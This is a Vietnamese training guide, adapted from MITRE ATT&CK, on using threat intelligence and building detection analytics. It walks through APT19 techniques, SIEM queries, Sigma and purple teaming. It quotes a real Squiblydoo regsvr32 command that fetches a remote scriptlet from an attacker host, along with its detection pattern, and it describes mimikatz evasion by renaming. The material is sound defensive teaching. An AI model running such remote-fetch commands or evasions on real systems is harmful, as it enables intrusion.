Chương Trình Đào Tạo An Toàn Thông Tin Quốc Tế Tại Việt Nam

Hiểu & Áp Dụng MITRE ATT&CK Trong An Toàn Thông Tin

Tổng hợp và Biên soạn : Vinh Nguyen Tran Tuong Dựa trên tài liệu gốc của MITRE ATT&CK https://attack.mitre.org/ Phần 1 Tình báo về mối đe dọa MITRE ATT&CK™ là một cơ sở kiến thức toàn cầu về chiến thuật và kỹ thuật của kẻ tấn công dựa trên quan sát thực tế. Cơ sở kiến…

IT-PRO
56–83 phút

Tổng hợp và Biên soạn :

Vinh Nguyen Tran Tuong

Dựa trên tài liệu gốc của MITRE ATT&CK

https://attack.mitre.org/

Phần 1 Tình báo về mối đe dọa

MITRE ATT&CK™ là một cơ sở kiến thức toàn cầu về chiến thuật và kỹ thuật của kẻ tấn công dựa trên quan sát thực tế. Cơ sở kiến thức ATT&CK được sử dụng làm nền tảng để phát triển các mô hình và phương pháp luận về mối đe dọa cụ thể trong khu vực tư nhân, chính phủ và cộng đồng sản phẩm và dịch vụ an ninh mạng.

https://itpro.edu.vn/cac-khoa-hoc-an-toan-thong-tin-khoa-hoc-may-tinh-quoc-te

Tài liệu này hướng dẫn cách bắt đầu sử dụng ATT&CK cho 4 trường hợp sử dụng chính:

  1. Thu thập thông tin tình báo về mối đe dọa
  2. Phát hiện và phân tích
  3. Mô phỏng kẻ tấn công và kiểm tra thâm nhập
  4. Đánh giá và cải thiện hệ thống

Mỗi chương được chia thành 3 cấp độ:

  • Cấp 1: Dành cho người mới bắt đầu, có ít tài nguyên
  • Cấp 2: Dành cho đội ngũ trung cấp đang phát triển
  • Cấp 3: Dành cho đội ngũ an ninh mạng nâng cao và có nhiều tài nguyên

APT19 là một nhóm tin tặc được cho là có liên quan đến Trung Quốc. Dưới đây là một số thông tin chính về APT19:

  1. Định nghĩa: APT19 (Advanced Persistent Threat 19) là một nhóm tấn công mạng tiên tiến và dai dẳng, được các chuyên gia an ninh mạng theo dõi và đặt tên.
  2. Nguồn gốc: Nhóm này được cho là có liên quan đến chính phủ Trung Quốc, mặc dù điều này không được xác nhận chính thức.
  3. Hoạt động: APT19 chủ yếu nhắm vào các tổ chức tài chính, pháp lý và đầu tư, đặc biệt là ở Mỹ và châu Âu.
  4. Phương pháp tấn công:
  • Sử dụng kỹ thuật lừa đảo (phishing) tinh vi
  • Khai thác các lỗ hổng bảo mật trong phần mềm
  • Sử dụng malware tùy chỉnh
  • Thực hiện các cuộc tấn công chuỗi cung ứng
  1. Mục tiêu: Thường nhắm vào việc đánh cắp thông tin nhạy cảm, bí mật thương mại và dữ liệu trí tuệ.
  2. Thời gian hoạt động: Được phát hiện từ khoảng năm 2013 và vẫn tiếp tục hoạt động.
  3. Tên gọi khác: Nhóm này còn được biết đến với các tên gọi khác như Codoso Team, C0d0so Team, Sunshop Group.
  4. Đặc điểm nhận dạng: APT19 thường sử dụng các công cụ và kỹ thuật độc đáo, giúp các chuyên gia an ninh mạng có thể nhận diện được hoạt động của họ.

Việc hiểu biết về các nhóm APT như APT19 rất quan trọng đối với các chuyên gia an ninh mạng để phát triển các chiến lược phòng thủ hiệu quả. Tuy nhiên, cần lưu ý rằng thông tin về các nhóm APT thường xuyên thay đổi và cập nhật.

Chương 1 – Thu thập thông tin tình báo về mối đe dọa

Cấp độ 1:

  • Chọn một nhóm tấn công mà bạn quan tâm từ danh sách các nhóm được liệt kê trên trang web ATT&CK
  • Xem xét các kỹ thuật mà nhóm đó đã sử dụng
  • Chia sẻ thông tin với đội phòng thủ để họ có thể tăng cường phát hiện

Ví dụ: Nếu bạn là một công ty dược phẩm / PHARMACEUTICAL, bạn có thể tìm kiếm trong thanh Tìm kiếm của MITRE ATT&CK hoặc trên trang Nhóm của MITRE ATT&CK để xác định rằng APT19 là một nhóm đã nhắm mục tiêu vào lĩnh vực của bạn.


TÌM KIẾM “PHARMACEUTICAL
MÔ TẢ VỀ NHÓM APT19


Tiếp theo, bạn có thể mở trang của nhóm đó để xem các kỹ thuật họ đã sử dụng (chỉ dựa trên báo cáo nguồn mở đã ánh xạ) để bạn có thể tìm hiểu thêm về chúng. Nếu bạn cần thêm thông tin về kỹ thuật vì bạn không quen thuộc thì cũng không vấn đề gì – chúng có ngay trên trang web ATT&CK. Bạn có thể lặp lại điều này cho mỗi mẫu phần mềm mà chúng tôi đã ánh xạ nhóm sử dụng, mà chúng tôi theo dõi riêng trên trang web ATT&CK.

Ví dụ: Một kỹ thuật được sử dụng bởi APT19 là Registry Run Keys/Startup Folder.

Vậy làm thế nào để chúng ta biến thông tin này thành hành động, đó là toàn bộ mục đích của tình báo về mối đe dọa?

Hãy chia sẻ chúng với người bảo vệ của chúng ta, vì đây là một nhóm đã nhắm mục tiêu vào lĩnh vực của chúng ta và chúng ta muốn phòng thủ chống lại họ. Khi bạn làm điều này, bạn có thể xem trang web ATT&CK để tìm một số ý tưởng để bắt đầu với Phát hiện và Giảm thiểu các kỹ thuật. Ví dụ: Hãy cho người bảo vệ của bạn biết về registry run key cụ thể mà APT19 đã sử dụng. Tuy nhiên, họ có thể thay đổi điều đó và sử dụng một run key khác. Nếu bạn xem lời khuyên Phát hiện cho kỹ thuật này, bạn sẽ thấy một khuyến nghị là giám sát Registry để tìm các run key mới mà bạn không mong đợi sẽ thấy trong môi trường của mình. Đây sẽ là một cuộc trò chuyện tuyệt vời để có với người bảo vệ hay nhóm của bạn.

Ý TƯỞNG PHÁT HIỆN CHO KỸ THUẬT REGISTRY RUN KEYS / STARTUP FOLDER

Tóm lại, một cách dễ dàng để bắt đầu sử dụng ATT&CK cho tình báo về mối đe dọa là xem xét một nhóm kẻ thù duy nhất mà bạn quan tâm. Xác định một số hành vi mà họ đã sử dụng giúp bạn thông báo cho người bảo vệ của bạn về cách họ có thể cố gắng phát hiện nhóm đó.

CẤP ĐỘ 2 Nếu bạn có một đội ngũ các nhà phân tích mối đe dọa thường xuyên xem xét thông tin về kẻ thù, một hành động cấp tiếp theo bạn có thể thực hiện là tự ánh xạ thông tin tình báo vào ATT&CK thay vì sử dụng những gì người khác đã ánh xạ. Nếu bạn có một báo cáo về một sự cố mà tổ chức của bạn đã làm việc, đây có thể là một nguồn nội bộ tuyệt vời để ánh xạ vào ATT&CK, hoặc bạn có thể sử dụng một báo cáo bên ngoài như một bài đăng trên blog. Để bắt đầu dễ dàng hơn, bạn có thể chỉ bắt đầu với một báo cáo .

Ví dụ: Đây là một đoạn trích từ một báo cáo của FireEye đã được ánh xạ vào ATT&CK. Chúng tôi nhận ra rằng có thể đáng sợ khi cố gắng ánh xạ vào ATT&CK khi bạn không biết tất cả các kỹ thuật hàng trăm. Đây là một quy trình bạn có thể làm theo để giúp với điều này.

  1. Hiểu ATT&CK—Làm quen với cấu trúc tổng thể của ATT&CK: chiến thuật (mục tiêu kỹ thuật của kẻ tấn công), kỹ thuật (cách thức đạt được những mục tiêu đó),và thủ tục (cách thực hiện cụ thể của các kỹ thuật). Hãy xem trang Bắt đầu của chúng tôi và Tài liệu Triết lý.
  1. Tìm hành vi—Suy nghĩ về hành động của kẻ tấn công theo cách rộng hơn chỉ là chỉ số nguyên tử (như một địa chỉ IP) mà họ đã sử dụng. Ví dụ, phần mềm độc hại trong báo cáo trên “thiết lập kết nối SOCKS5.” Hành động thiết lập kết nối là một hành vi mà kẻ tấn công đã thực hiện.
  2. Nghiên cứu hành vi—Nếu bạn không quen thuộc với hành vi, bạn có thể cần phải làm thêm nghiên cứu. Trong ví dụ của chúng ta, một chút nghiên cứu sẽ cho thấy rằng SOCKS5 là một giao thức Layer 5 (lớp phiên).
  3. Dịch hành vi thành một chiến thuật—Xem xét mục tiêu kỹ thuật của kẻ tấn công cho hành vi đó và chọn một chiến thuật phù hợp. Tin tốt là: chỉ có 12 chiến thuật để chọn trong ATT&CK Enterprise. Đối với ví dụ kết nối SOCKS5, thiết lập kết nối để giao tiếp sau này sẽ thuộc chiến thuật Điều khiển và Chỉ huy.
  4. Tìm ra kỹ thuật nào áp dụng cho hành vi—Điều này có thể hơi khó khăn, nhưng với kỹ năng phân tích của bạn và các ví dụ trên trang web ATT&CK, nó là có thể làm được. Nếu bạn tìm kiếm SOCKS trên trang web của chúng tôi, kỹ thuật Giao thức lớp không phải ứng dụng tiêu chuẩn (T1095) xuất hiện. Nhìn vào mô tả kỹ thuật, bạn sẽ thấy đây có thể là nơi hành vi của chúng ta phù hợp.
  5. So sánh kết quả của bạn với các nhà phân tích khác—Tất nhiên, bạn có thể có một diễn giải khác về hành vi so với một nhà phân tích khác. Điều này là bình thường, và nó xảy ra mọi lúc trong nhóm ATT&CK! Tôi khuyên bạn nên so sánh việc ánh xạ ATT&CK của bạn về thông tin với một nhà phân tích khác và thảo luận về bất kỳ sự khác biệt nào.

Đối với những đội CTI có một vài nhà phân tích, tự ánh xạ thông tin vào ATT&CK có thể là một cách tốt để đảm bảo bạn đang nhận được thông tin phù hợp nhất để đáp ứng yêu cầu của tổ chức bạn. Từ đó, bạn có thể chuyển thông tin về kẻ tấn công đã được ánh xạ ATT&CK cho người bảo vệ của bạn để thông báo cho họ về phòng thủ, như chúng ta đã thảo luận ở trên.

CẤP ĐỘ 3

Nếu đội CTI của bạn là nâng cao, bạn có thể bắt đầu ánh xạ nhiều thông tin hơn vào ATT&CK, và sau đó sử dụng thông tin đó để ưu tiên cách bạn phòng thủ. Sử dụng quy trình trên, bạn có thể ánh xạ cả thông tin nội bộ và bên ngoài vào ATT&CK, bao gồm dữ liệu ứng phó sự cố, báo cáo từ OSINT hoặc đăng ký tình báo về mối đe dọa, cảnh báo thời gian thực và thông tin lịch sử của tổ chức bạn.

Một khi bạn đã ánh xạ dữ liệu này, bạn có thể làm một số điều thú vị để so sánh các nhóm và ưu tiên các kỹ thuật thường được sử dụng. Ví dụ, hãy xem cái nhìn ma trận này từ ATT&CK Navigator mà tôi đã chia sẻ trước đó với các kỹ thuật chúng tôi đã ánh xạ trên trang web ATT&CK. Các kỹ thuật chỉ được sử dụng bởi APT3 được đánh dấu màu xanh dương; những kỹ thuật chỉ được sử dụng bởi APT29 được đánh dấu màu vàng, và những kỹ thuật được sử dụng bởi cả APT3 và APT29 được đánh dấu màu xanh lá. (Tất cả điều này chỉ dựa trên thông tin có sẵn công khai mà chúng tôi đã ánh xạ, chỉ là một tập con của những gì các nhóm đó đã làm.)

CÁC KỸ THUẬT CỦA APT3 + APT29

Bạn nên thay thế các nhóm và kỹ thuật mà bạn quan tâm dựa trên các mối đe dọa hàng đầu của tổ chức bạn. Để giúp bạn tạo các lớp Navigator của riêng bạn như tôi đã làm ở trên, đây là hướng dẫn từng bước về các bước bạn có thể thực hiện để tạo ra ma trận trên, cũng như một video hướng dẫn cũng cung cấp tổng quan về chức năng của Navigator.

HƯỚNG DẪN TỪNG BƯỚC VỀ CÁCH SO SÁNH CÁC LỚP

VIDEO GIỚI THIỆU NAVIGATOR VÀ GIẢI THÍCH CÁCH SO SÁNH CÁC LỚP

Sau đó chúng ta có thể tổng hợp thông tin để xác định các kỹ thuật thường được sử dụng, điều này có thể giúp người bảo vệ biết những gì họ nên ưu tiên để phát hiện và giảm thiểu. Trong ma trận của chúng ta ở trên, nếu APT3 và APT29 là hai nhóm mà một tổ chức coi là mối đe dọa cao đối với họ, các kỹ thuật màu xanh lá có thể là ưu tiên cao nhất để xác định cách giảm thiểu và phát hiện. Nếu người bảo vệ của chúng ta đã đưa ra yêu cầu cho đội CTI giúp tìm ra nơi họ nên ưu tiên nguồn lực cho phòng thủ, chúng ta có thể chia sẻ thông tin này với họ như một nơi để họ bắt đầu.

Nếu người bảo vệ của chúng ta đã thực hiện đánh giá về những gì họ có thể phát hiện (mà chúng ta sẽ đề cập trong các chương sau), bạn có thể chồng thông tin đó lên những gì bạn biết về các mối đe dọa của bạn. Đây là một nơi tuyệt vời để tập trung nguồn lực của bạn vì bạn biết các nhóm mà bạn quan tâm đã sử dụng những kỹ thuật đó và bạn không thể phát hiện chúng!

Bạn có thể tiếp tục thêm vào các kỹ thuật mà bạn đã quan sát thấy kẻ tấn công thực hiện dựa trên dữ liệu bạn có và phát triển một “bản đồ nhiệt” về các kỹ thuật thường được sử dụng. Brian Beyer và tôi đã nói tại Hội nghị thượng đỉnh SANS CTI về cách chúng tôi đã đưa ra các “top 20” kỹ thuật khác nhau dựa trên các bộ dữ liệu do MITRE và Red Canary tuyển chọn. Đội của bạn có thể làm theo quy trình tương tự để tạo “top 20” của riêng bạn.

Quá trình ánh xạ các kỹ thuật ATT&CK này không hoàn hảo và có thiên vị, nhưng thông tin này vẫn có thể giúp bạn bắt đầu có được bức tranh rõ ràng hơn về những gì kẻ tấn công đang làm. (Bạn có thể đọc thêm về thiên vị và hạn chế trong bài trình bày slide này, và chúng tôi hy vọng sẽ chia sẻ thêm suy nghĩ sớm.)

Đối với một đội nâng cao muốn sử dụng ATT&CK cho CTI, ánh xạ các nguồn khác nhau vào ATT&CK có thể giúp bạn xây dựng hiểu biết sâu sắc về hành vi của kẻ tấn công để giúp ưu tiên và thông báo về phòng thủ trong tổ chức của bạn.

TÓM TẮT

Trong chương đầu tiên của hướng dẫn Bắt đầu, chúng tôi đã hướng dẫn bạn qua ba cấp độ khác nhau về cách bắt đầu với ATT&CK và tình báo về mối đe dọa, tùy thuộc vào tài nguyên của đội bạn. Trong các chương tới, chúng tôi sẽ đi sâu vào cách bạn có thể bắt đầu với các trường hợp sử dụng khác, bao gồm phát hiện và phân tích, mô phỏng kẻ tấn công và kiểm tra thâm nhập, và đánh giá và kỹ thuật.

Phần 2 Phát hiện và phân tích

Bạn đã đọc Chương 1 về việc bắt đầu sử dụng ATT&CK cho tình báo về mối đe dọa, trong đó hướng dẫn cách hiểu những gì kẻ tấn công đang làm để tấn công bạn và cách sử dụng kiến thức đó để ưu tiên những gì cần phòng thủ. Trong chương này, tôi sẽ nói về cách xây dựng phát hiện cho những hành vi đó.

Cũng như chương đầu tiên trong cuốn sách này, chương này sẽ được chia thành các cấp độ dựa trên mức độ phức tạp của đội bạn và những tài nguyên bạn có thể tiếp cận:

Cấp độ 1 dành cho những người mới bắt đầu có thể không có nhiều tài nguyên Cấp độ 2 dành cho những đội cấp trung bắt đầu trưởng thành Cấp độ 3 dành cho những đội an ninh mạng tiên tiến hơn và có nhiều tài nguyên

Xây dựng phân tích để phát hiện các kỹ thuật ATT&CK có thể khác với cách bạn vẫn thường làm phát hiện. Thay vì xác định những thứ được biết là xấu và chặn chúng, phân tích dựa trên ATT&CK liên quan đến việc thu thập dữ liệu nhật ký và sự kiện về những thứ đang xảy ra trên hệ thống của bạn và sử dụng nó để xác định các hành vi đáng ngờ được mô tả trong ATT&CK.

CẤP ĐỘ 1

Bước đầu tiên để tạo và sử dụng phân tích ATT&CK là hiểu những dữ liệu và khả năng tìm kiếm bạn có. Để tìm các hành vi đáng ngờ, sau tất cả, bạn cần có khả năng xem những gì đang xảy ra trên hệ thống của bạn. Một cách để làm điều này là xem xét Nguồn dữ liệu được liệt kê cho mỗi kỹ thuật ATT&CK.

Những nguồn dữ liệu đó mô tả các loại dữ liệu có thể cung cấp cho bạn khả năng hiển thị kỹ thuật đã cho. Nói cách khác, chúng cung cấp cho bạn một điểm khởi đầu tốt về những gì cần thu thập.

NGUỒN DỮ LIỆU CHO MỘT KỸ THUẬT ATT&CK

Nếu bạn xem qua các nguồn dữ liệu cho nhiều kỹ thuật khác nhau, hoặc làm theo cách tiếp cận mà Roberto Rodriguez và Jose Luis Rodriguez đã trình bày tại ATT&CKcon để xem qua các kỹ thuật về nguồn dữ liệu (MITRE cũng đã tạo một số script hỗ trợ), bạn sẽ nhận thấy rằng một số nguồn có giá trị trong việc phát hiện một số lượng lớn kỹ thuật:

Giám sát quá trình và dòng lệnh quá trình, thường được thu thập bởi Sysmon, Windows Event Logs và nhiều nền tảng EDR Giám sát tệp và registry, cũng thường được thu thập bởi Sysmon, Windows Event Logs, và nhiều nền tảng EDR Nhật ký xác thực, chẳng hạn như những nhật ký được thu thập từ bộ điều khiển miền qua Windows Event Logs Bắt gói tin, đặc biệt là bắt gói tin đông/tây như những gói tin được thu thập giữa các máy chủ và enclaves trong mạng của bạn bởi các cảm biến như Zeek

Khi bạn biết những dữ liệu bạn có, bạn sẽ cần thu thập dữ liệu đó vào một loại nền tảng tìm kiếm nào đó (Quản lý Thông tin và Sự kiện Bảo mật hoặc SIEM) để bạn có thể chạy phân tích chống lại nó. Bạn có thể đã có điều này như một phần của hoạt động IT hoặc bảo mật của bạn, hoặc nó có thể là một thứ mới mà bạn cần xây dựng. Đối với những ảnh chụp màn hình này và phần hướng dẫn, tôi sẽ sử dụng ELK (ElasticSearch/Logstash/Kibana) với dữ liệu Sysmon, nhưng có một số sản phẩm thương mại và mã nguồn mở, và chúng tôi không khuyến nghị bất kỳ nền tảng cụ thể nào. Đừng đánh giá thấp những bước này trong quá trình; điều chỉnh việc thu thập dữ liệu của bạn thường là phần khó khăn nhất!

Nội dung cấp độ 0 bổ sung: Cần truy cập vào một bộ dữ liệu doanh nghiệp tốt để kiểm tra? Hãy xem bộ dữ liệu Boss of the SOC (BOTS) từ Splunk hoặc bộ dữ liệu BRAWL từ MITRE . Cả hai đều có sẵn dưới dạng JSON và do đó có thể được tải vào Splunk, ELK và các SIEM khác. BOTS rất rộng và chứa nhiễu thực, trong khi BRAWL hạn chế hơn nhiều và chỉ tập trung vào hoạt động của đội đỏ.

Một khi bạn đã có dữ liệu trong SIEM của mình, bạn đã sẵn sàng để thử một số phân tích. Một điểm khởi đầu tuyệt vời là xem xét các phân tích được tạo bởi những người khác và chạy chúng chống lại dữ liệu của bạn. Có một số kho lưu trữ phân tích được liệt kê trong các tài nguyên bên dưới, nhưng một phân tích khởi đầu tốt nếu bạn có dữ liệu quá trình endpoint là CAR-2016–03–002. Điều đó sẽ cố gắng tìm việc sử dụng WMI để thực thi lệnh trên các hệ thống từ xa, một kỹ thuật phổ biến của kẻ tấn công được mô tả bởi Windows Management Instrumentation.

MỤC CAR CHO TẠO QUÁ TRÌNH TỪ XA QUA WMIC

Bạn sẽ muốn đọc và hiểu mô tả để biết nó đang tìm kiếm cái gì, nhưng phần quan trọng để chạy nó là mã giả ở cuối. Dịch mã giả đó thành một tìm kiếm cho bất kỳ SIEM nào bạn đang sử dụng (đảm bảo rằng tên trường trong dữ liệu của bạn là chính xác), và bạn có thể chạy nó để nhận kết quả. Nếu bạn không thoải mái dịch mã giả, bạn cũng có thể sử dụng một công cụ mã nguồn mở gọi là Sigma và kho lưu trữ các quy tắc của nó để dịch sang mục tiêu của bạn. Trong trường hợp này, CAR-2016–03–002 đã được bao gồm trong một quy tắc Sigma rồi.

Nếu bạn đã cài đặt Sigma và bạn đang ở trong thư mục của nó, bạn có thể chạy lệnh này để nhận (ví dụ) truy vấn ELK/WinLogBeats:

sigmac –target es-qs -c tools/config/winlogbeat.yml rules/windows/process_ creation/win_susp_wmi_execution.yml

KẾT QUẢ TỪ VIỆC CHẠY PHÂN TÍCH WMI CHỐNG LẠI DỮ LIỆU BRAWL

Công việc của bạn bây giờ là xem xét từng kết quả và tìm ra xem nó có độc hại hay không. Nếu bạn sử dụng bộ dữ liệu BRAWL, tất cả đều khá độc hại: nó cố gắng chạy and.exe, và khi khám phá thêm các sự kiện liên quan, and.exe vừa mới được chuyển đến máy chủ đó qua SMB và được thêm vào các khóa registry tự động chạy để duy trì. Nếu bạn đang xem dữ liệu doanh nghiệp của riêng bạn, hy vọng là lành tính hoặc dữ liệu đội đỏ đã biết—nếu không, có lẽ hãy dừng đọc chương này và tìm hiểu xem bạn đang đối phó với cái gì.

Khi bạn có tìm kiếm cơ bản trả về dữ liệu và cảm thấy thoải mái rằng bạn có thể hiểu được kết quả, hãy cố gắng lọc ra các cảnh báo sai trong môi trường của bạn để bạn không áp đảo chính mình. Mục tiêu của bạn không nên là đạt đến số cảnh báo sai bằng không; nó nên là giảm chúng càng nhiều càng tốt trong khi vẫn đảm bảo rằng bạn sẽ bắt được hành vi độc hại. Một khi phân tích có tỷ lệ cảnh báo sai thấp, bạn có thể tự động tạo một vé trong SOC của bạn mỗi khi phân tích kích hoạt hoặc thêm nó vào thư viện phân tích để sử dụng cho săn tìm mối đe dọa thủ công.

CẤP ĐỘ 2

Khi bạn đã có các phân tích mà người khác viết trong hoạt động, bạn có thể bắt đầu mở rộng phạm vi bao phủ bằng cách tự viết các phân tích của riêng bạn. Đây là một quá trình phức tạp hơn đòi hỏi phải hiểu cách các cuộc tấn công hoạt động và cách chúng được phản ánh trong dữ liệu. Để bắt đầu, hãy xem mô tả kỹ thuật từ ATT&CK và các báo cáo tình báo về mối đe dọa được liên kết trong các ví dụ.

Ví dụ, hãy giả sử không có phát hiện nào tốt cho Regsvr32. Trang ATT&CK liệt kê một số biến thể khác nhau về cách Regsvr32 được sử dụng. Thay vì viết một phân tích để bao quát tất cả chúng, hãy tập trung vào chỉ một khía cạnh để tránh mất công sức. Ví dụ, bạn có thể muốn phát hiện biến thể “Squiblydoo” được phát hiện bởi Casey Smith tại Red Canary. Các báo cáo được liên kết từ các ví dụ cho thấy một số trường hợp của dòng lệnh mà Regsvr32 được sử dụng, chẳng hạn như ví dụ này từ phân tích của Cybereason về Cobalt Kitty:

Kẻ tấn công đã tải xuống COM scriplets bằng regsvr32.exe: regsvr32 /s/n/u/i:hxxp://support.chatconnecting(.)com:80/pic.png scrobj.dll

BẰNG CHỨNG VỀ SQUIBLYDOO ĐƯỢC SỬ DỤNG BỞI COBALT KITTY

Khi bạn đã hiểu cách kẻ tấn công sử dụng kỹ thuật này, bạn nên tìm cách tự chạy nó để bạn có thể thấy nó trong nhật ký của riêng bạn. Một cách dễ dàng để làm điều đó là sử dụng Atomic Red Team, một dự án mã nguồn mở do Red Canary dẫn đầu cung cấp nội dung đội đỏ phù hợp với ATT&CK có thể được sử dụng để kiểm tra phân tích. Ví dụ, bạn có thể tìm danh sách các cuộc tấn công của họ cho Regsvr32, bao gồm Squiblydoo. Tất nhiên, nếu bạn đã làm kiểm tra thâm nhập, hãy tự do chạy các cuộc tấn công mà bạn biết (trên các hệ thống mà bạn có quyền!) và cố gắng phát triển phân tích cho những cuộc tấn công đó!

Nội dung cấp độ 0 bổ sung: Thực sự muốn tạo phân tích của riêng bạn và chạy các cuộc tấn công của riêng bạn nhưng không có mạng riêng? Hãy thiết lập một VM và giám sát nó như trên, sau đó chạy các cuộc tấn công trên đó. Detection Lab cung cấp một bộ script cấu hình tốt để làm điều đó.

ĐẦU RA TỪ VIỆC CHẠY CUỘC TẤN CÔNG SQUIBLYDOO ĐỂ KHỞI CHẠY CALC.EXE

Khi bạn đã chạy cuộc tấn công, hãy xem bên trong SIEM của bạn để thấy dữ liệu nhật ký nào đã được tạo ra. Ở giai đoạn này, bạn đang tìm kiếm những thứ làm cho sự kiện độc hại này trông khác biệt. Tôi đã chọn Squiblydoo làm ví dụ vì nó là một ví dụ dễ dàng: không có lý do chính đáng nào để regsvr32.exe gọi ra Internet, vì vậy một phân tích đơn giản là tìm kiếm thời điểm quá trình regsvr32.exe được tạo và dòng lệnh bao gồm “/i:http”.

Một mô hình chung cần tuân theo là viết tìm kiếm để phát hiện hành vi độc hại, sửa đổi nó để lọc ra các cảnh báo sai, đảm bảo nó vẫn phát hiện được hành vi độc hại, và sau đó lặp lại để giảm các loại cảnh báo sai khác.

QUY TRÌNH PHÁT TRIỂN PHÂN TÍCH

CẤP ĐỘ 3

Cảm thấy tự tin rằng bạn đang tạo ra các phân tích chất lượng để phát hiện các cuộc tấn công từ Atomic Red Team? Hãy kiểm tra sự tự tin đó và cải thiện khả năng phòng thủ của bạn bằng cách thực hiện một số đội tím!

Trong thế giới thực, kẻ tấn công không chỉ thực hiện các cuộc tấn công sao chép/dán từ một cuốn sách nào đó. Họ thích nghi và cố gắng né tránh khả năng phòng thủ của bạn – bao gồm cả các phân tích của bạn (đó là lý do tại sao có một chiến thuật né tránh phòng thủ trong ATT&CK). Cách tốt nhất để đảm bảo rằng các phân tích của bạn mạnh mẽ chống lại sự né tránh là làm việc trực tiếp với một đội đỏ. Bạn và đội xanh của bạn sẽ chịu trách nhiệm tạo ra các phân tích và đội đỏ sẽ chịu trách nhiệm mô phỏng kẻ tấn công – về cơ bản, cố gắng né tránh các phân tích của bạn bằng cách thực hiện các loại tấn công và né tránh mà chúng ta biết từ tình báo về mối đe dọa rằng kẻ tấn công sử dụng trong thế giới thực. Nói cách khác, họ sẽ hành động như kẻ tấn công thực sự để bạn có thể hiểu cách các phân tích của bạn sẽ hoạt động chống lại kẻ tấn công thực sự.

Đây là cách nó có thể hoạt động trong thực tế. Bạn có một số phân tích, ví dụ để phát hiện việc đánh cắp thông tin đăng nhập. Có thể bạn đã nghe nói về mimikatz và viết một phân tích để phát hiện mimikatz.exe trên dòng lệnh hoặc Invoke-Mimikatz qua Powershell. Để thực hiện đội tím cho điều này, hãy đưa phân tích đó cho đội đỏ của bạn. Sau đó họ có thể tìm và thực hiện một cuộc tấn công sẽ né tránh phân tích đó.

Trong trường hợp này, họ có thể đổi tên tệp thực thi thành mimidogz.exe. Tại thời điểm đó, bạn sẽ cần cập nhật phân tích của mình để tìm kiếm các dấu hiệu và hành vi khác nhau mà sẽ không phụ thuộc vào tên chính xác. Có lẽ bạn tìm kiếm bitmask GrantedAccess cụ thể từ khi mimikatz truy cập lsass.exe (đừng lo lắng về chi tiết chính xác, đây chỉ là một ví dụ). Bạn sẽ lại đưa điều này cho đội đỏ của bạn, và họ sẽ thực hiện một cách né tránh mà, ví dụ, thêm một quyền truy cập bổ sung để bitmask GrantedAccess của bạn không còn phát hiện được nó.

Sự trao đổi qua lại này được gọi là đội tím. Đó là một cách tuyệt vời để nhanh chóng cải thiện chất lượng của các phân tích của bạn vì nó đo lường khả năng phát hiện các cuộc tấn công mà kẻ tấn công thực sự sử dụng. Khi bạn đạt đến giai đoạn mà bạn đang thực hiện đội tím cho tất cả các phân tích của mình, bạn thậm chí có thể tự động hóa quá trình để đảm bảo bạn không có bất kỳ sự thoái lui nào và đang bắt được các biến thể mới của các cuộc tấn công. Chúng tôi đang làm việc để phát triển tài liệu giống như vậy, nói nhiều hơn về mô phỏng kẻ tấn công và kiểm tra thâm nhập

  • vì vậy hãy theo dõi để tìm hiểu nhiều hơn về nửa còn lại của quá trình đó.

Điều này cũng liên quan đến những gì Andy Applebaum sẽ nói trong Chương 4 về Đánh giá SOC ATT&CK. Khi bạn đã nâng cao đến mức này và đang xây dựng một bộ phân tích, bạn sẽ muốn sử dụng ATT&CK (thông qua ATT&CK Navigator hoặc sử dụng các công cụ riêng của bạn) để theo dõi những gì bạn có thể và không thể bao quát. Có thể, ví dụ, bạn bắt đầu với một danh sách mong muốn các phân tích để phát hiện các kỹ thuật mà Katie Nickels và Brian Beyer chỉ ra trong bài thuyết trình tại Hội nghị thượng đỉnh SANS CTI

BẢN ĐỒ NHIỆT VỚI CÁC KỸ THUẬT ĐƯỢC NHẮM MỤC TIÊU

Sau đó, bạn tích hợp các phân tích từ CAR và tô màu cam cho những kỹ thuật đó để chỉ ra rằng ít nhất bạn có một số phạm vi bao phủ (như đã chỉ ra ở trên, một phân tích duy nhất không thể cung cấp phạm vi bao phủ đầy đủ cho bất kỳ kỹ thuật nào).

BẢN ĐỒ NHIỆT VỚI CÁC PHÂN TÍCH CAR

Sau đó, bạn tinh chỉnh những phân tích đó và có thể thêm nhiều hơn để cải thiện phạm vi bao phủ của mình cho những kỹ thuật đó. Cuối cùng, có lẽ bạn cảm thấy đủ thoải mái với khả năng phát hiện của mình đối với một số trong số chúng để tô màu xanh lá cây. Chỉ cần nhớ rằng bạn sẽ không bao giờ chắc chắn 100% về việc bắt được mọi cách sử dụng một kỹ thuật nhất định, vì vậy màu xanh lá cây không có nghĩa là đã hoàn thành, nó chỉ có nghĩa là OK hiện tại.

BẢN ĐỒ NHIỆT VỚI CÁC PHÂN TÍCH CAR VÀ PHÂN TÍCH TỰ PHÁT TRIỂN

Và tất nhiên, theo thời gian, bạn sẽ muốn mở rộng phạm vi những thứ mà bạn quan tâm. Bạn có thể tham khảo lại Chương 1 về việc ưu tiên theo tác nhân đe dọa, sử dụng một số tài nguyên được nhà cung cấp công bố để ưu tiên dựa trên mức độ phổ biến của kỹ thuật dựa trên giám sát của họ, hoặc có lẽ tốt nhất là phát triển phân tích cho hoạt động mà bạn biết từ các sự cố của riêng mình. Cuối cùng, bạn muốn phát triển một tập hợp phát hiện ngày càng toàn diện hơn để bạn có thể phát hiện nhiều hơn những thứ mà kẻ tấn công làm để tấn công chúng ta – và ATT&CK cung cấp cho bạn bảng điểm để làm điều đó.

TÓM TẮT

Chương này đã cung cấp cho bạn một ý tưởng về ý nghĩa của việc xây dựng phân tích để phát hiện các kỹ thuật ATT&CK, cũng như cách suy nghĩ về việc xây dựng một bộ phân tích. Nó xây dựng trên chương trước để cho thấy không chỉ bạn có thể hiểu những gì kẻ tấn công có thể làm thông qua tình báo về mối đe dọa mạng, mà bạn còn có thể sử dụng thông tin tình báo đó để xây dựng phân tích để phát hiện những kỹ thuật đó. Các chương sau sẽ nói nhiều hơn về cách xây dựng một quy trình kỹ thuật và đánh giá cho khả năng phòng thủ của bạn, bao gồm cả phân tích, và cách thực hiện kiểm tra thâm nhập toàn diện để xác thực khả năng phòng thủ của bạn.

TÀI NGUYÊN

CAR: Kho lưu trữ phân tích của MITRE

EQL: Kho lưu trữ phân tích mã nguồn mở của Endgame

Sigma: Một định dạng phân tích độc lập với công cụ, cùng với kho lưu trữ phân tích trong định dạng đó từ Florian Roth và Thomas Patzke

